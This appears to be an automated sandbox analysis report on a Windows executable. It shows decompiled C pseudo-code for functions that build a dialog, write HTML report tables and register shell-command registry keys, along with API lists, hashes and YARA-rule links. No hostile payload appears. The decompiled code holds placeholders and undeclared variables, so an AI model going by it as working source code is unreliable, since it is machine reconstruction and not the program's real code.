                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 97%
                                                                                      			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                                      0x00403c09
                                                                                      0x00403c0c
                                                                                      0x00403c11
                                                                                      0x00403c1b
                                                                                      0x00403c3f
                                                                                      0x00403c4a
                                                                                      0x00403c6e
                                                                                      0x00403c96
                                                                                      0x00403c9a
                                                                                      0x00403ca6
                                                                                      0x00403cb3
                                                                                      0x00403cb8
                                                                                      0x00403cc5
                                                                                      0x00403cca
                                                                                      0x00403cdd
                                                                                      0x00403ce6
                                                                                      0x00403cf8
                                                                                      0x00403d11
                                                                                      0x00403d26
                                                                                      0x00403d3f
                                                                                      0x00403d54
                                                                                      0x00403d6d
                                                                                      0x00403d76
                                                                                      0x00403d88
                                                                                      0x00403d9e
                                                                                      0x00403db0
                                                                                      0x00403db5
                                                                                      0x00403dc4
                                                                                      0x00403dc8
                                                                                      0x00403dc9
                                                                                      0x00403dca
                                                                                      0x00403dda
                                                                                      0x00403ddf
                                                                                      0x00403de2
                                                                                      0x00403de3
                                                                                      0x00403df4
                                                                                      0x00403df8
                                                                                      0x00403df9
                                                                                      0x00403dfa
                                                                                      0x00403e0a
                                                                                      0x00403e0f
                                                                                      0x00403e12
                                                                                      0x00403e13
                                                                                      0x00403e22
                                                                                      0x00403e26
                                                                                      0x00403e28
                                                                                      0x00403e29
                                                                                      0x00403e39
                                                                                      0x00403e3e
                                                                                      0x00403e41
                                                                                      0x00403e42
                                                                                      0x00403e51
                                                                                      0x00403e55
                                                                                      0x00403e57
                                                                                      0x00403e58
                                                                                      0x00403e68
                                                                                      0x00403e6d
                                                                                      0x00403e70
                                                                                      0x00403e71
                                                                                      0x00403e71
                                                                                      0x00403e87
                                                                                      0x00403e8d
                                                                                      0x00403e9e
                                                                                      0x00403ea6
                                                                                      0x00403eaf
                                                                                      0x00403ebc

                                                                                      APIs
                                                                                        • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                        • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                        • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                        • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                      • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                      • GetDlgItem.USER32 ref: 00403C2F
                                                                                      • SetWindowLongW.USER32 ref: 00403C39
                                                                                        • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                        • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                        • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                        • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                      • LoadImageW.USER32 ref: 00403C6A
                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                      • LoadImageW.USER32 ref: 00403C7F
                                                                                      • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                      • GetDlgItem.USER32 ref: 00403CB0
                                                                                        • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                        • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                      • GetDlgItem.USER32 ref: 00403CC2
                                                                                      • GetDlgItem.USER32 ref: 00403CD4
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                        • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                        • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                        • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                        • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                      • GetDlgItem.USER32 ref: 00403D64
                                                                                      • GetDlgItem.USER32 ref: 00403DC0
                                                                                      • GetDlgItem.USER32 ref: 00403DF0
                                                                                      • GetDlgItem.USER32 ref: 00403E20
                                                                                      • GetDlgItem.USER32 ref: 00403E4F
                                                                                      • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                      • GetDlgItem.USER32 ref: 00403E9B
                                                                                      • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                      • String ID:
                                                                                      • API String ID: 1038210931-0
                                                                                      • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                      • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                      • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                      • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 56%
                                                                                      			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                                      0x00407763
                                                                                      0x0040776c
                                                                                      0x00407784
                                                                                      0x0040778b
                                                                                      0x00407797
                                                                                      0x00407799
                                                                                      0x0040779b
                                                                                      0x004077a7
                                                                                      0x004077ae
                                                                                      0x004077bd
                                                                                      0x004077c4
                                                                                      0x004077d3
                                                                                      0x004077da
                                                                                      0x004077e1
                                                                                      0x004077e6
                                                                                      0x004077f2
                                                                                      0x004077f5
                                                                                      0x00407804
                                                                                      0x00407805
                                                                                      0x00407810
                                                                                      0x00407812
                                                                                      0x00407813
                                                                                      0x00407818
                                                                                      0x00407818
                                                                                      0x00407825
                                                                                      0x0040782d
                                                                                      0x00407830
                                                                                      0x0040783a
                                                                                      0x00407840
                                                                                      0x00407846
                                                                                      0x00407849
                                                                                      0x00407850
                                                                                      0x0040785e
                                                                                      0x00407864
                                                                                      0x00407867
                                                                                      0x0040786b
                                                                                      0x0040786f
                                                                                      0x00407877
                                                                                      0x0040787a
                                                                                      0x00407885
                                                                                      0x00407892
                                                                                      0x004078a8
                                                                                      0x004078b8
                                                                                      0x004078c5
                                                                                      0x004078ff
                                                                                      0x004078c7
                                                                                      0x004078ca
                                                                                      0x004078dd
                                                                                      0x004078de
                                                                                      0x004078e3
                                                                                      0x004078e8
                                                                                      0x004078eb
                                                                                      0x004078f0
                                                                                      0x004078f0
                                                                                      0x00407906
                                                                                      0x00407909
                                                                                      0x0040790f
                                                                                      0x0040791d
                                                                                      0x00407923
                                                                                      0x0040792d
                                                                                      0x00407932
                                                                                      0x0040793b
                                                                                      0x00407942
                                                                                      0x00407943
                                                                                      0x0040794c
                                                                                      0x00407953
                                                                                      0x00407954
                                                                                      0x00407959
                                                                                      0x0040795c
                                                                                      0x00407961
                                                                                      0x0040796c
                                                                                      0x00407971
                                                                                      0x0040797a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00407838
                                                                                      0x00407838
                                                                                      0x0040783a
                                                                                      0x00407980
                                                                                      0x0040798a
                                                                                      0x004079a1

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                      • API String ID: 1607361635-601624466
                                                                                      • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                      • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                      • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                      • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 40%
                                                                                      			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                      0x00407b65
                                                                                      0x00407b7c
                                                                                      0x00407b83
                                                                                      0x00407b91
                                                                                      0x00407b98
                                                                                      0x00407ba6
                                                                                      0x00407bad
                                                                                      0x00407bb2
                                                                                      0x00407bb9
                                                                                      0x00407bca
                                                                                      0x00407bcb
                                                                                      0x00407bd6
                                                                                      0x00407bdb
                                                                                      0x00407bdc
                                                                                      0x00407be1
                                                                                      0x00407be1
                                                                                      0x00407be8
                                                                                      0x00407bf9
                                                                                      0x00407bfa
                                                                                      0x00407c05
                                                                                      0x00407c0a
                                                                                      0x00407c0b
                                                                                      0x00407c1c
                                                                                      0x00407c21
                                                                                      0x00407c21
                                                                                      0x00407c2a
                                                                                      0x00407c2b
                                                                                      0x00407c36
                                                                                      0x00407c3b
                                                                                      0x00407c3c
                                                                                      0x00407c41
                                                                                      0x00407c51
                                                                                      0x00407c56
                                                                                      0x00407c5b
                                                                                      0x00407c65
                                                                                      0x00407c68
                                                                                      0x00407c6b
                                                                                      0x00407c74
                                                                                      0x00407c7b
                                                                                      0x00407c80
                                                                                      0x00407c82
                                                                                      0x00407c88
                                                                                      0x00407ca6
                                                                                      0x00407c8a
                                                                                      0x00407c8a
                                                                                      0x00407c8b
                                                                                      0x00407c96
                                                                                      0x00407c9b
                                                                                      0x00407c9c
                                                                                      0x00407ca1
                                                                                      0x00407ca1
                                                                                      0x00407cb3
                                                                                      0x00407cb4
                                                                                      0x00407cbd
                                                                                      0x00407cc4
                                                                                      0x00407cc5
                                                                                      0x00407cd0
                                                                                      0x00407cd5
                                                                                      0x00407cd6
                                                                                      0x00407cdb
                                                                                      0x00407ceb
                                                                                      0x00407cf0
                                                                                      0x00407cf3
                                                                                      0x00407cf3
                                                                                      0x00407cf3
                                                                                      0x00000000
                                                                                      0x00407cfc
                                                                                      0x00407d00

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                      • API String ID: 2000436516-3842416460
                                                                                      • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                      • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                      • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                      • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 51%
                                                                                      			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                                      0x00404415
                                                                                      0x0040441d
                                                                                      0x0040442c
                                                                                      0x00404435
                                                                                      0x004045b3
                                                                                      0x004045b7
                                                                                      0x004045b7
                                                                                      0x0040444b
                                                                                      0x00404452
                                                                                      0x00404457
                                                                                      0x00404460
                                                                                      0x00404461
                                                                                      0x00404462
                                                                                      0x0040446d
                                                                                      0x00404472
                                                                                      0x00404473
                                                                                      0x00404490
                                                                                      0x004044a5
                                                                                      0x004044b4
                                                                                      0x004044b6
                                                                                      0x004044b7
                                                                                      0x004044bd
                                                                                      0x004044cf
                                                                                      0x004044db
                                                                                      0x004044eb
                                                                                      0x004044f1
                                                                                      0x004044f6
                                                                                      0x004044f9
                                                                                      0x004044fe
                                                                                      0x00404506
                                                                                      0x00404507
                                                                                      0x00404508
                                                                                      0x00404510
                                                                                      0x00404521
                                                                                      0x00404532
                                                                                      0x00404539
                                                                                      0x00404547
                                                                                      0x0040454e
                                                                                      0x0040455b
                                                                                      0x0040455c
                                                                                      0x00404564
                                                                                      0x0040456f
                                                                                      0x00404570
                                                                                      0x00404571
                                                                                      0x0040457c
                                                                                      0x0040457d
                                                                                      0x00404588
                                                                                      0x00404589
                                                                                      0x0040458a
                                                                                      0x004045a0
                                                                                      0x004045a5
                                                                                      0x00404521
                                                                                      0x004044eb
                                                                                      0x004045ab
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00404452
                                                                                      • _snwprintf.MSVCRT ref: 00404473
                                                                                        • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                        • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                        • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                      • memset.MSVCRT ref: 004044CF
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                      • memset.MSVCRT ref: 00404539
                                                                                      • memset.MSVCRT ref: 0040454E
                                                                                      • _snwprintf.MSVCRT ref: 00404571
                                                                                      • _snwprintf.MSVCRT ref: 0040458A
                                                                                        • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.243959785.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.243953266.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243968190.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243973892.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000005.00000002.243979245.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                      • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                      • API String ID: 486436031-734527199
                                                                                      • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                      • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                      • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                      • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 87%
                                                                                      			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;
